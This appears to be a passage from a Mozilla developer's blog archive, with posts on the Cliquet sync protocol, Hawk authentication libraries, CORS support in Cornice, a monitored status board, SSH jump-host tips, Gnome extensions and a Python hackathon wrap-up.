That is a pity, since building on PouchDB’s client-side experience with synchronisation seems like a very good idea.

On the other hand, we have several interesting features:

No map-reduce;
Partial and/or ordered and/or paginated synchronisation;
The client chooses, through headers, whether to overwrite the data or to respect the server’s version;
A single server to deploy for N applications;
Dead-simple self-hosting;
The client can choose not to use a “local store” at all;
In the JS client, management of the “local store” will be delegated (we are thinking of LocalForage or Dexie.js).

And we meet the rest of the specifications mentioned at the beginning of the article!

The philosophical arguments

It is an illusion to think that one tool can do everything.

We have other use cases in the pipeline that seem to match PouchDB’s scope (no notion of permissions or sharing, JavaScript environment, …). We will take advantage of it when it turns out to be relevant!

The ecosystem we want to build will try to cover the use cases that are poorly addressed by PouchDB. It is meant to be:

Based on our very simple protocol;
Minimalist and multi-purpose (like the famous 2CV);
Naive (no rocket science);
Without magic (explicit and easy to reimplement from scratch).

The philosophy and features of the Cliquet Python toolkit will of course be in the spotlight :)

As for Remote Storage, as soon as the need arises we will be very proud to join the initiative, but for now it seems risky to us to start out by bending the solution.

The practical arguments

Before agreeing to deploy a CouchDB-based solution, Mozilla’s ops will ask us to prove beyond doubt that it cannot be done with the stacks that are already well-proven internally (i.e. MySQL, Redis, PostgreSQL).

In addition, we must commit to keeping the data for at least 5 years. With Cliquet, using the PostgreSQL backend, data is persisted flat in a plain and simple PostgreSQL schema. That would not be the case with a LevelDown adapter, which would handle notions of revisions scattered across a key-value schema.

If we base the service on Cliquet, as is the case with Kinto, all the production automation work (monitoring, RPM builds, Puppet…) that we did for Reading List is fully reusable.

Likewise, if we start over with a completely different stack, we will have to redo all the breaking-in, profiling and optimisation work carried out in the first quarter.

Next steps

And there is still time to change strategy :) We would love to get as much feedback as possible! It is always a difficult decision to make… </call for trolls>

Bending an existing ecosystem vs. building a custom one;
Controlling the whole thing vs. integrating;
Contributing vs. redoing;
Leading vs. following.

We really do intend to join the no-backend initiative, and this first step does not rule out converging eventually! Maybe we will end up making our service compatible with Remote Storage, and maybe PouchDB will become more agnostic about the synchronisation protocol…

Using this new ecosystem for the “Payments” project will let us develop a permission system (probably based on OAuth scopes) that matches the stated need. And we fully intend to draw on our experience with Daybed on the subject.

We will also extract the code of the clients implemented for Reading List in order to build a minimalist JavaScript client.

By going off on our own, we are taking several risks:

reinventing a wheel we are not aware of;
failing to make the Cliquet ecosystem a community project;
failing to position Cliquet in the niche of use cases not covered by PouchDB :)

As Giovanni Ornaghi puts it:

Rolling out your set of webservices, push notifications, or background services might give you more control, but at the same time it will force you to engineer, write, test, and maintain a whole new ecosystem.

That is precisely the ecosystem the Mozilla Cloud Services team is responsible for!

[1] There is the Sharesome project, which lets you publicly share resources from your remote storage.

Service de nuages !

2015-04-01T00:00:00+02:00

This article is reposted from “Service de Nuages”, my team’s blog at Mozilla.

Quite a few changes since the beginning of the year for the French-speaking “cloud-services” team!

First of all, important news: the team is growing, with fairly complementary profiles: n1k0 and Mathieu have come to lend a hand to Tarek, Rémy and Alexis.

The beginning of the year saw the launch of Firefox Hello, which gave us the opportunity to scale up its server, written in Node.js®.

A reading list server

In parallel, a reading list synchronisation project (Reading List) came to life. The idea is to be able to mark pages as “to read later” and to continue reading on any synchronised device (Firefox for Android or Firefox Desktop). A free-software equivalent of Pocket, in a way, that you can host yourself.

To build it, we could have reused Firefox Sync; after all, it is a very robust data synchronisation service, built with Cornice. But Sync was not designed to guarantee the durability of data, and the step was too high to change that in depth.

We could also have settled for building yet another application that exposes an API and persists data in a database.

But this new little team is not here by chance :)

The “Daybed Team”

We share a vision: a generic data storage service! Maybe that reminds you of a certain project named Daybed? For client applications, whether JavaScript, mobile or otherwise, using this service must be child’s play! The application manages its data locally (aka offline-first), and synchronises on demand.

Here, the heart of the Reading List server is precisely a “CRUD” API (Create, Retrieve, Update, Delete) that handles synchronisation and authentication. So we decided to build a “simple” API, with as few specificities as possible, that would lay the foundations of a generic service. Notably because other projects of the same kind are going to follow.

Quite a lot of experience has been accumulated within the team, on the one hand with the creation of Firefox Sync and on the other with Daybed, our side project, so we are trying not to repeat the same mistakes while keeping the concepts that have proven themselves.

For example, we kept Sync’s mechanism of record collections and timestamps. Since these issues are recurrent, if not unavoidable, we decided to take the synchronisation protocol, extend it slightly and, above all, decouple it from the reading list project.
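To give an idea of what “collections of records and timestamps” means in practice, here is a deliberately naive, in-memory sketch. It is not Cliquet’s code: the `Collection` class, the `last_modified` field and the `changes_since` method are names chosen for the illustration, and a simple counter stands in for the server timestamp.

```python
import itertools


class Collection:
    """In-memory collection where every write gets an increasing timestamp."""

    def __init__(self):
        self._records = {}
        self._clock = itertools.count(1)  # stand-in for a server timestamp

    def put(self, record_id, data):
        record = dict(data, id=record_id, last_modified=next(self._clock))
        self._records[record_id] = record
        return record

    def changes_since(self, timestamp=0):
        """Return the records modified after `timestamp`, oldest first."""
        changed = [r for r in self._records.values() if r["last_modified"] > timestamp]
        return sorted(changed, key=lambda r: r["last_modified"])


articles = Collection()
articles.put("a", {"title": "First"})
articles.put("b", {"title": "Second"})
last_seen = articles.changes_since()[-1]["last_modified"]  # client remembers this
articles.put("a", {"title": "First, edited"})
delta = articles.changes_since(last_seen)  # only what changed since last sync
```

A client only has to remember the highest timestamp it has seen and ask for what changed after it, which is what keeps the client side simple.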

The mechanism that forces you to move forward

As a first building block, we gave birth to the Cliquet project, whose main idea is to provide a Python implementation of this protocol, while factoring in all of our good practices (for production in particular).

The advantage of having a protocol rather than a monolith is that if you prefer Asyncio, io.js or Go, we will encourage you to publish your alternative implementation!

With Cliquet, the code of the reading list server mostly consists of defining a schema for the records, then forcing field values on certain calls. This reduces the project to a few dozen lines of code.

As for the future generic storage service, the project is still in its infancy, but it is well and truly under way! It can already be plugged in as a storage backend in a Cliquet application, and that was implemented in 20 lines of code!

Oh, and this time we will only build features based on concrete needs as they arise. It sounds obvious, but on Daybed we didn’t see it coming :)

In upcoming articles, we plan to describe the good practices gathered in the protocol (or in Cliquet) and certain specific technical points, and to present our vision through examples and tutorials.

See you soon, then!

What’s Hawk and how to use it?

2014-07-31T00:00:00+02:00

At Mozilla, we recently had to implement the Hawk authentication scheme for a number of projects, and we ended up creating two libraries to ease integration into pyramid and node.js apps.

But maybe you don’t know Hawk.

Hawk is a relatively new technology, crafted by one of the original OAuth specification authors, that intends to replace the 2-legged OAuth authentication scheme using a simpler approach.

It is an authentication scheme for HTTP, built around HMAC digests of requests and responses.

Every authenticated client request has an Authorization header containing a MAC (Message Authentication Code) and some additional metadata. Each server response to an authenticated request then contains a Server-Authorization header that authenticates the response, so the client can be sure it comes from the right server.
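To give a feel for what “an HMAC digest of the request” means, here is a simplified sketch of the MAC computation using only the standard library. The layout of the normalized string follows my reading of the Hawk README and should be treated as an assumption; the function name `hawk_request_mac` is made up, and for real use a library such as mohawk is the safer choice.

```python
import base64
import hashlib
import hmac


def hawk_request_mac(key, ts, nonce, method, resource, host, port,
                     payload_hash="", ext=""):
    """Compute a base64 HMAC-SHA256 over a newline-separated request summary."""
    # Assumed layout of the normalized string (one field per line).
    normalized = "\n".join([
        "hawk.1.header",
        str(ts),
        nonce,
        method.upper(),
        resource,
        host.lower(),
        str(port),
        payload_hash,
        ext,
    ]) + "\n"
    digest = hmac.new(key.encode("utf-8"), normalized.encode("utf-8"),
                      hashlib.sha256).digest()
    return base64.b64encode(digest).decode("ascii")


mac = hawk_request_mac("secret-key", 1406800000, "j4h3g2", "get",
                       "/registration", "localhost", 5000)
```

The server recomputes the same MAC from the request it received and the key it has stored for the given id; any difference in method, path, host or timestamp changes the digest.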

Exchange of the hawk id and hawk key

To sign the requests, a client needs to retrieve a token id and a token key from the server.

Hawk itself does not define how these credentials should be exchanged between the server and the client. The excellent team behind Firefox Accounts put together a scheme to do that, which works as follows:

Note

All this derivation craziness might seem a bit complicated, but don’t worry, we put together some libraries that take care of that for you automatically. If you are not interested in these details, you can jump directly to the next section to see how to use the libraries.

When your server application needs to send you the credentials, it returns them inside a specific Hawk-Session-Token header. This token is then derived into two values (hawk id and hawk key) that you will use to sign your next requests.

In order to get the hawk credentials, you’ll need to:

First, do an HKDF derivation on the given session token. You’ll need to use the following parameters:

key_material = HKDF(hawk_session, "", 'identity.mozilla.com/picl/v1/sessionToken', 32*2)

Note

The `identity.mozilla.com/picl/v1/sessionToken` is a reference to this way of deriving the credentials, not an actual URL.

Then, the key material you get out of the HKDF needs to be split into two parts: the first 32 bytes are the hawk id, and the next 32 are the hawk key.

Credentials:

credentials = {
    'id': keyMaterial[0:32],
    'key': keyMaterial[32:64],
    'algorithm': 'sha256'
}
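For the curious, the whole derivation fits in a few lines of standard-library Python. This is a sketch under assumptions: HKDF is implemented here as described in RFC 5869 with SHA-256, the session token is assumed to be hex-encoded, and the id and key are returned hex-encoded. The helper names are mine, not those of an existing library.

```python
import hashlib
import hmac


def hkdf_sha256(secret, salt, info, length):
    """HKDF (extract then expand, RFC 5869) using HMAC-SHA256."""
    if not salt:
        salt = b"\x00" * hashlib.sha256().digest_size
    prk = hmac.new(salt, secret, hashlib.sha256).digest()  # extract step
    okm, block, counter = b"", b"", 1
    while len(okm) < length:  # expand step
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        okm += block
        counter += 1
    return okm[:length]


def derive_hawk_credentials(session_token_hex):
    """Derive the hawk id and key from a hex-encoded session token."""
    key_material = hkdf_sha256(
        bytes.fromhex(session_token_hex),
        b"",
        b"identity.mozilla.com/picl/v1/sessionToken",
        32 * 2,
    )
    return {
        "id": key_material[:32].hex(),
        "key": key_material[32:64].hex(),
        "algorithm": "sha256",
    }


credentials = derive_hawk_credentials("00" * 32)  # dummy token for the example
```

In practice you should not need this: the libraries presented below do the derivation for you.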

Httpie

To showcase APIs in the documentation, I like to use httpie, a curl-replacement with a nicer API, built around the python requests library.

Luckily, HTTPie allows you to plug different authentication schemes into it, so I wrote a wrapper around mohawk to add hawk support to the requests lib.

Doing hawk requests in your terminal is now as simple as:

$ pip install requests-hawk httpie
$ http GET localhost:5000/registration --auth-type=hawk --auth='id:key'

In addition, it will help you to craft requests using the requests library:

import requests
from requests_hawk import HawkAuth

hawk_auth = HawkAuth(
  credentials={'id': id, 'key': key, 'algorithm': 'sha256'})

requests.post("/url", auth=hawk_auth)

Alternatively, if you don’t have the token id and key, you can pass the hawk session token I talked about earlier and the lib will take care of the derivation for you:

hawk_auth = HawkAuth(
    hawk_session=resp.headers['hawk-session-token'],
    server_url=self.server_url
)
requests.post("/url", auth=hawk_auth)

Integrate with python pyramid apps

If you’re writing pyramid applications, you’ll be happy to learn that Ryan Kelly put together a library that makes Hawk work as an Authentication provider for them. I’m shocked by how simple it is to use.

Here is a demo of how we implemented it for Daybed:

from pyramid_hawkauth import HawkAuthenticationPolicy

policy = HawkAuthenticationPolicy(decode_hawk_id=get_hawk_id)
config.set_authentication_policy(policy)

The get_hawk_id function takes a request and a token id and returns a tuple of (token_id, token_key).

How you want to store the tokens and retrieve them is up to you. The default implementation (i.e. if you don’t pass a decode_hawk_id function) decodes the key from the token itself, using a master secret on the server (so you don’t need to store anything).

Integrate with node.js Express apps

We had to implement Hawk authentication for two node.js projects and ended up factoring everything into a library for express, named express-hawkauth.

In order to plug it in your application, you’ll need to use it as a middleware:

var express = require("express");
var hawk = require("express-hawkauth");
var app = express();

var hawkMiddleware = hawk.getMiddleware({
  hawkOptions: {},
  getSession: function(tokenId, cb) {
    // A function which passes to the cb the key and algorithm for the
    // given token id. First argument of the callback is a potential
    // error.
    cb(null, {key: "key", algorithm: "sha256"});
  },
  createSession: function(id, key, cb) {
    // A function which stores a session for the given id and key.
    // Argument returned is a potential error.
    cb(null);
  },
  setUser: function(req, res, tokenId, cb) {
    // A function that uses req and res, and the hawkId when it's known, so
    // that it can tweak them. For instance, you can store the tokenId as the
    // user.
    req.user = tokenId;
    cb();
  }
});

app.get("/hawk-enabled-endpoint", hawkMiddleware);

If you pass the createSession parameter, all non-authenticated requests will create a new hawk session and return it with the response, in the Hawk-Session-Token header.

If you want to only check a valid hawk session exists (without creating a new one), just create a middleware which doesn’t have any createSession parameter defined.

Some reference implementations

As a reference, here is how we’re using the libraries I’m talking about, in case that helps you to integrate with your projects.

The Mozilla Loop server uses hawk as authentication once you’re logged in with a valid BrowserID assertion, to keep a session between client and server;
I recently added hawk support to the Daybed project (that’s a pyramid / cornice app);
It’s also interesting to note that Kumar put together hawkrest, for the django rest framework.

Implementing CORS in Cornice

2013-02-04T00:00:00+01:00

Note

I’m cross-posting [on the mozilla services weblog](https://blog.mozilla.org/services/). Since this is the first time we’re doing that, I thought it could be useful to point you there. Check it out and expect more technical articles there in the future.

For security reasons, browsers don’t let a page do cross-domain requests by default. In other words, if you have a page served from the domain lolnet.org, it will not be possible for it to get data from notmyidea.org.

Well, it’s possible, using tricks and techniques like JSONP, but that doesn’t work all the time (see the section below). I remember writing some simple proxies on my own server to be able to query other people’s APIs.

Thankfully, there is a nicer way to do this, namely “Cross-Origin Resource Sharing”, or CORS.

You want an icecream? Go ask your dad first.

If you want to use CORS, you need the API you’re querying to support it on the server side.

The HTTP server needs to answer to the OPTIONS verb with the appropriate response headers.

OPTIONS is sent as what the authors of the spec call a “preflight request”: just before doing a request to the API, the User-Agent (the browser most of the time) asks the resource for permission, with an OPTIONS call.

The server answers, and tells what is available and what isn’t:

1a. The User-Agent, rather than doing the call directly, asks the server (the API) for permission to do the request. It does so with the following headers:
- Access-Control-Request-Headers contains the headers the User-Agent wants to send.
- Access-Control-Request-Method contains the method the User-Agent wants to use.
1b. The API answers what is authorized:
- Access-Control-Allow-Origin, the origin that’s accepted. Can be * or the domain name.
- Access-Control-Allow-Methods, a list of allowed methods. This can be cached. Note that the request asks permission for one method and the server should return a list of accepted methods.
- Access-Control-Allow-Headers, a list of allowed headers, for all of the methods, since this can be cached as well.
2. The User-Agent can do the “normal” request.

So, if you want to access the /icecream resource, and do a PUT there, you’ll have the following flow:

> OPTIONS /icecream
> Access-Control-Request-Method: PUT
> Origin: notmyidea.org
< 200 OK
< Access-Control-Allow-Origin: notmyidea.org
< Access-Control-Allow-Methods: PUT,GET,DELETE

You can see that we have an Origin header in the request, as well as an Access-Control-Request-Method. We’re here asking if we have the right, as notmyidea.org, to do a PUT request on /icecream.

And the server tells us that we can do that, as well as GET and DELETE.
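Seen from the server, answering a preflight is mostly a lookup. Here is a minimal, framework-free sketch of that decision; the function name `preflight_response` and its parameters are made up for the example, and it ignores Access-Control-Request-Headers to stay short.

```python
def preflight_response(request_headers, allowed_origins, allowed_methods):
    """Return the CORS headers answering a preflight, or {} when refused."""
    origin = request_headers.get("Origin")
    method = request_headers.get("Access-Control-Request-Method")
    if origin is None or method is None:
        return {}  # not a preflight request
    if "*" not in allowed_origins and origin not in allowed_origins:
        return {}  # unknown origin: send no CORS headers
    if method not in allowed_methods:
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        # The whole list is returned, not only the requested method,
        # so that the answer can be cached by the User-Agent.
        "Access-Control-Allow-Methods": ",".join(allowed_methods),
    }


icecream_headers = preflight_response(
    {"Origin": "notmyidea.org", "Access-Control-Request-Method": "PUT"},
    allowed_origins=("notmyidea.org",),
    allowed_methods=("PUT", "GET", "DELETE"),
)
```

When the returned dict is empty, the browser sees no CORS headers in the answer and refuses to send the actual request.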

I won’t cover all the details of the CORS specification here, but bear in mind that with CORS you can control which methods, headers and origins are authorized, and whether the client is allowed to send authentication information or not.

A word about security

CORS is not an answer for every cross-domain call you want to do, because you need to control the service you want to call. For instance, if you want to build a feed reader and access the feeds on different domains, you can be pretty much sure that the servers will not implement CORS, so you’ll need to write a proxy yourself, to provide this.

Secondly, if misunderstood, CORS can be insecure, and cause problems. Because the rules apply when a client wants to do a request to a server, you need to be extra careful about who you’re authorizing.

An incorrectly secured CORS server can be accessed by a malicious client very easily, bypassing network security. For instance, say you host a server on an intranet that is only available from behind a VPN but accepts every cross-origin call: a bad guy can inject javascript into the browser of a user who has access to your protected server and make calls to your service, which is probably not what you want.

How is this different from JSONP?

You may know the JSONP protocol. JSONP allows cross origin, but for a particular use case, and does have some drawbacks (for instance, it’s not possible to do DELETEs or PUTs with JSONP).

JSONP exploits the fact that it is possible to get information from another domain when you are asking for javascript code, using the <script> element.

Exploiting the open policy for <script> elements, some pages use them to retrieve JavaScript code that operates on dynamically generated JSON-formatted data from other origins. This usage pattern is known as JSONP. Requests for JSONP retrieve not JSON, but arbitrary JavaScript code. They are evaluated by the JavaScript interpreter, not parsed by a JSON parser.
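On the server side, JSONP comes down to wrapping the JSON payload in a call to a function whose name the client chose. A small sketch, with a hypothetical `jsonp_body` helper; validating the callback name is my addition, since the body is executed as code by the browser.

```python
import json
import re

# Only accept callback names that look like a plain JavaScript identifier.
_CALLBACK_NAME = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*")


def jsonp_body(callback, data):
    """Wrap `data` as a JavaScript call, e.g. callback({...});"""
    if not _CALLBACK_NAME.fullmatch(callback):
        raise ValueError("invalid callback name: %r" % callback)
    return "{}({});".format(callback, json.dumps(data))


body = jsonp_body("handleIcecream", {"flavour": "vanilla"})
```

The page then loads the URL through a <script> element, and the browser runs `handleIcecream(...)` with the data; this is also why only GET requests are possible.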

Using CORS in Cornice

Okay, things are hopefully clearer about CORS, let’s see how we implemented it on the server-side.

Cornice is a toolkit that lets you define resources in python and takes care of the heavy lifting for you, so I wanted it to take care of the CORS support as well.

In Cornice, you define a service like this:

from cornice import Service

foobar = Service(name="foobar", path="/foobar")

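# and then you do something with it
@foobar.get()
def get_foobar(request):
    # do something with the request, then return a response
    # (the returned value is a placeholder for this example).
    return {"foo": "bar"}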

To add CORS support to this resource, you can go this way, with the cors_origins parameter:

foobar = Service(name='foobar', path='/foobar', cors_origins=('*',))

Ta-da! You have enabled CORS for your service. Be aware that you’re authorizing anyone to query your server, which may not be what you want.

Of course, you can specify a list of origins you trust, and you don’t need to stick with *, which means “authorize everyone”.
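As an illustration of what checking a list of trusted origins can look like, here is a small standalone sketch. It assumes glob-style patterns matched with the standard library's `fnmatch`; the function name `is_origin_allowed` and the example origins are hypothetical, and this is not necessarily how Cornice matches origins internally.

```python
from fnmatch import fnmatchcase


def is_origin_allowed(origin, allowed_origins):
    """Return True if the Origin header value matches an allowed pattern."""
    return any(fnmatchcase(origin, pattern) for pattern in allowed_origins)


# Hypothetical list of trusted origins.
trusted = ("https://app.example.org", "https://*.example.com")

print(is_origin_allowed("https://api.example.com", trusted))
print(is_origin_allowed("https://evil.test", trusted))
```

With `('*',)` every origin matches, which is exactly why the wildcard should be a deliberate choice.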

Headers

You can define the headers you want to expose for the service:

foobar = Service(name='foobar', path='/foobar', cors_origins=('*',))

@foobar.get(cors_headers=('X-My-Header', 'Content-Type'))
def get_foobars_please(request):
    return "some foobar for you"

I did some testing and it wasn’t working in Chrome because I wasn’t handling the headers the right way (the missing one was Content-Type, which Chrome was asking for). With my first version of the implementation, service implementers had to explicitly list all the headers that should be exposed. While this improves security, it can be frustrating while developing.

So I introduced an expose_all_headers flag, which is set to True by default, if the service supports CORS.

Cookies / Credentials

By default, the requests you do to your API endpoint don’t include the credential information for security reasons. If you really want to do that, you need to enable it using the cors_credentials parameter. You can activate this one on a per-service basis or on a per-method basis.

Caching

When you do a preflight request, the information returned by the server can be cached by the User-Agent so that it’s not redone before each actual call.

The caching period is defined by the server, using the Access-Control-Max-Age header. You can configure this timing using the cors_max_age parameter.
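To show where these settings end up, here is a rough sketch of the headers a server could attach to a preflight response. The function `preflight_headers` and its parameters are invented for this example; only the header names come from the CORS specification.

```python
def preflight_headers(origin, allowed_methods, max_age=None, credentials=False):
    """Build the CORS headers for a preflight (OPTIONS) response."""
    headers = {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Methods": ", ".join(allowed_methods),
    }
    if credentials:
        # Tells the browser that cookies and auth headers may be sent.
        headers["Access-Control-Allow-Credentials"] = "true"
    if max_age is not None:
        # Number of seconds the browser may cache this preflight answer.
        headers["Access-Control-Max-Age"] = str(max_age)
    return headers


headers = preflight_headers(
    "https://app.example.org", ["GET", "POST"], max_age=3600, credentials=True
)
```

Note that when credentials are allowed, browsers refuse a wildcard `*` as the allowed origin, so the server has to echo a specific origin.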

Simplifying the API

We have cors_headers, cors_enabled, cors_origins, cors_credentials, cors_max_age, cors_expose_all_headers… a fair number of parameters. If you want a specific CORS policy for your services, it can be a bit tedious to pass these to each of them every time.

I introduced another way to pass the CORS policy, so you can do something like this:

policy = dict(enabled=False,
              headers=('X-My-Header', 'Content-Type'),
              origins=('*.notmyidea.org',),
              credentials=True,
              max_age=42)

foobar = Service(name='foobar', path='/foobar', cors_policy=policy)
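One way to picture the policy dict is as shorthand for the individual cors_* keyword arguments. The helper below, `expand_cors_policy`, is a hypothetical illustration of that mapping rather than Cornice's actual code.

```python
def expand_cors_policy(policy):
    """Turn a policy dict into the equivalent cors_* keyword arguments."""
    return {"cors_" + key: value for key, value in policy.items()}


policy = dict(origins=("*.notmyidea.org",), credentials=True, max_age=42)
kwargs = expand_cors_policy(policy)
print(sorted(kwargs))
```

The same policy object can then be shared between several services instead of repeating each parameter.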

Comparison with other implementations

I was curious to have a look at other implementations of CORS, in django for instance, and I found a gist about it.

Basically, this adds a middleware that adds the “right” headers to the response, depending on the request.

While this approach works, it’s not implementing the specification completely. You need to add support for all the resources at once.

We can think of a nice way to implement this: specifying directly in your settings what is supposed to be exposed via CORS and what isn’t. In my opinion, CORS support should be handled at the service definition level, except for the list of authorized hosts. Otherwise, you don’t know exactly what’s going on when you look at the definition of the service.

Resources

There are a number of good resources that can be useful to you if you want to either understand how CORS works, or if you want to implement it yourself.

http://enable-cors.org/ is useful to get started when you don’t know anything about CORS.
There is a W3C wiki page containing information that may be useful about clients, common pitfalls etc: http://www.w3.org/wiki/CORS_Enabled
HTML5 rocks has a tutorial explaining how to implement CORS, with a nice section about the server-side.
Be sure to have a look at the clients support-matrix for this feature.
About security, check out this page
If you want to have a look at the implementation code, check on github

Of course, the W3C specification is the best resource to rely on. This specification isn’t hard to read, so you may want to go through it, especially the “resource processing model” section.

Status board

2012-12-29T00:00:00+01:00

By dint of starting web services at the drop of a hat, offering to host friends’ websites, doing the same for a few non-profits and so on, I ended up with, as they say, a good pile of sites and services to manage on lolnet.org, my server.

Until very recently, none of this was backed up, nor was it monitored. After some research, I came across stashboard, a well-made “status board”. The only problem is that it is written to run on GAE, Google App Engine. Fortunately, it is open source, and it has been forked to give birth to whiskerboard.

Checking the status of services

So, it’s nice, it’s easy to install and all that, but… it doesn’t actually do what I want: it only displays the status of the services, it doesn’t check that everything is actually “up”.

That’s a bit annoying for me, because that’s really what I wanted. No big deal, I know how to code a bit, so I might as well put that to use. I added a few features to the software, which are available on my fork, on github: https://github.com/almet/whiskerboard.

Among other things, it is now possible to run celery in the background and periodically check that the services are still alive, using a dedicated task.

It was a joy to develop this (two of us did it, with Guillaume, pair programming over mumble + tmux, in one short evening; it really flies).

The changes are fairly simple, you can have a look at them here: https://github.com/almet/whiskerboard/compare/b539337416…master

In short:

added a connection_string to services (of the form protocol://host:port)
added a check_status command that iterates over the services and launches the appropriate celery tasks, depending on the protocol
added the tasks in question
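The idea behind these changes can be sketched in a few lines. This is not the code from the fork: the function names and the `CHECKERS` table are invented here, and plain functions stand in for the celery tasks. It only shows how a connection string of the form protocol://host:port can be parsed and dispatched to a check that depends on the protocol.

```python
import socket
from urllib.parse import urlsplit


def parse_connection_string(connection_string):
    """Split 'protocol://host:port' into its three parts."""
    parts = urlsplit(connection_string)
    return parts.scheme, parts.hostname, parts.port


def check_tcp(host, port, timeout=5):
    """Return True if a TCP connection to host:port can be opened."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


# Hypothetical mapping from protocol name to the check to run.
CHECKERS = {"tcp": check_tcp}


def check_service(connection_string):
    """Run the check matching the protocol of the connection string."""
    protocol, host, port = parse_connection_string(connection_string)
    checker = CHECKERS.get(protocol)
    if checker is None:
        raise ValueError("no checker for protocol %r" % protocol)
    return checker(host, port)
```

Adding support for a new protocol then comes down to registering one more function in the table.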

Deployment

In the end, the longest part was deploying it, because I obviously didn’t want to deploy my monitoring service on my own server.

After a (rather quick, actually) try on heroku, I realized I would have to pay close to $35 a month to have a celeryd process running, so I looked elsewhere and finally deployed the thing at alwaysdata.

After a few adventures, I managed to get everything running. It was a bit of a battle at first to install virtualenv (I had to make changes to my PATH for it to work). Here is my `.bash_profile`:

export PYTHONPATH=~/modules/
export PATH=$HOME/modules/bin:$HOME/modules/:$PATH

After that, all that’s left is to install with `easy_install`:

easy_install --install-dir ~/modules -U pip
easy_install --install-dir ~/modules -U virtualenv

And to create the virtualenv:

virtualenv venv
venv/bin/pip install -r requirements.txt

The last step is to create an application.wsgi file that makes the application available, with the right venv.

SSL and Requests

A few turns of the crank later, I have a celeryd running and consuming the tasks sent to it (for simplicity, I used celery’s django backend, so there is no need for AMQP, for instance).

Problem: the resources I check over SSL (HTTPS) reject me. I don’t know exactly why at the moment, but it seems that when I make a request with Requests I get Connection Refused errors. Maybe some obscure proxy issue? In the meantime, calls with CURL work, so I added a fallback to CURL when the other methods fail. Not very clean, but it works.

EDIT: It finally turned out that my server was misconfigured. I was using haproxy + stunnel, and the SSL negotiation was going wrong. With SSL and TLS enabled, and SSLv2 disabled, everything works better.

And there you go

In the end, I have my pretty status board running like a charm at http://status.lolnet.org :-)

SSH tips

2012-12-27T00:00:00+01:00

Tunnelling

Because I never remember it (scatterbrain that I am):

$ ssh -f hote -L local:lolnet.org:destination -N

.ssh/config

(thanks gaston!)

The following directive in .ssh/config lets you hop from host to host, with the hosts separated by “+”:

Host *+*
        ProxyCommand ssh $(echo %h | sed 's/+[^+]*$//;s/\([^+%%]*\)%%\([^+]*\)$/\2 -l \1/;s/:/ -p /') PATH=.:\$PATH nc -w1 $(echo %h | sed 's/^.*+//;/:/!s/$/ %p/;s/:/ /')

You can then specify ssh “hops” such as:

ssh root@91.25.25.25+192.168.1.1
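The two sed expressions in that directive are dense, so here is my reading of them, transcribed into Python. The function name `split_hop` is made up, and this is only a sketch of the string manipulation: the first expression yields the arguments for the ssh command to the intermediate host (everything before the last “+”, with `user%host` turned into `host -l user` and `:port` into `-p port`), the second yields the host and port that nc connects to from there.

```python
import re


def split_hop(host_spec, port):
    """Mimic the two sed expressions of the ProxyCommand.

    Returns (arguments for ssh to the jump host, "host port" for nc).
    """
    # First sed: drop the last "+segment", which is the final target.
    jump = re.sub(r"\+[^+]*$", "", host_spec)
    # Turn a trailing "user%host" into "host -l user".
    jump = re.sub(r"([^+%]*)%([^+]*)$", r"\2 -l \1", jump, count=1)
    # Turn the first ":port" into " -p port".
    jump = jump.replace(":", " -p ", 1)

    # Second sed: keep only what follows the last "+".
    target = re.sub(r"^.*\+", "", host_spec)
    # Without an explicit port, append the default one (%p in ssh_config).
    if ":" not in target:
        target += " %s" % port
    target = target.replace(":", " ", 1)
    return jump, target


print(split_hop("root@91.25.25.25+192.168.1.1", 22))
```

Because the jump part can itself contain a “+”, it matches the `Host *+*` pattern again, which is how longer chains of hosts get resolved one hop at a time.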

Then you can try adding:

Host <label_for_my_private_server>
    user <myuser(root)>
    IdentityFile  <path to my ssh key for the public server>
    hostname public_server_ip+private_server_ip

Gnome 3, extensions

2012-12-27T00:00:00+01:00

After trying unity, ubuntu’s default desktop, for quite a while, I wanted a change, so I had another look at gnome 3.

And in the end, I found a few extensions that are really useful, which I list here.

Antisocial Menu removes the buttons and text related to the social web. I didn’t need them since I’m connected to my instant messenger in a terminal, using weechat.
Coverflow Alt-Tab replaces the default application switcher. I find it much more practical than the default one since it lets me see, at full size, which window I’m about to display.
Media player indicator lets me see in real time what is going on in my audio player. It may not seem like much, but I missed it. It integrates perfectly with Spotify, and that’s nice.
Search Firefox bookmarks lets you… take a guess?

A bit less useful, but you never know:

“Advanced Settings in UserMenu” gives you a shortcut to the advanced settings in the user menu (top right)
An integration with Getting Things Gnome (a GTD tool). I’m currently experimenting with this tool, so I don’t know yet whether it will stay, but why not.

You can browse https://extensions.gnome.org/ to find others to your taste.

Cheese & code - Wrap-up

2012-10-22T00:00:00+02:00

This week-end I hosted a cheese & code session in the country-side of Angers, France.

We were a bunch of python hackers and it rained a lot, which forced us to stay inside and code. Bad.

There were not enough of us to get rid of all the cheese and the awesome meals, but well, we finally managed it pretty well.

Here is a summary of what we worked on:

Daybed

Daybed started some time ago, and intends to be a replacement for Google Forms in terms of features, but built as a REST web service, in python, and open source.

In case you wonder, daybed is effectively the name of a couch. We chose this name because of the similarities (in the sound) with db, and because we’re using CouchDB as a backend.

We mainly hacked on daybed and are pretty close to the release of the first version, meaning that we have something working.

The code is available on github, and we also wrote a small documentation for it.

Mainly, we did a lot of cleanup, rewrote a bunch of tests so that it would be easier to continue working on the project, and implemented some minor features. I’m pretty confident that we now have a really good basis for this project.

Also, we will have a nice todolist application, with the backend and the frontend, in javascript / html / css, you’ll know more when it’ll be ready :-)

Once we have something good enough, we’ll release the first version and I’ll host it somewhere so that people can play with it.

Cornice

Daybed is built on top of Cornice, a framework to ease the creation of web-services.

At Pycon France, we had the opportunity to attend a good presentation about SPORE. SPORE is a way to describe your REST web services, as WSDL is for WS-* services. This eases the creation of generic SPORE clients, which are able to consume any REST API with a SPORE endpoint.

Here is how you can let cornice describe your web service for you:

from cornice.ext.spore import generate_spore_description
from cornice.service import Service, get_services

spore = Service('spore', path='/spore', renderer='jsonp')
@spore.get()
def get_spore(request):
    services = get_services()
    return generate_spore_description(services, 'Service name',
                                      request.application_url, '1.0')

And you’ll get a definition of your service, in SPORE, available at /spore.

Of course, you can use it to do other things, like generating the file locally and exporting it wherever it makes sense to you, etc.

Today I released Cornice 0.11, which adds, among other things, support for SPORE, plus some other fixes we found along the way.

Respire

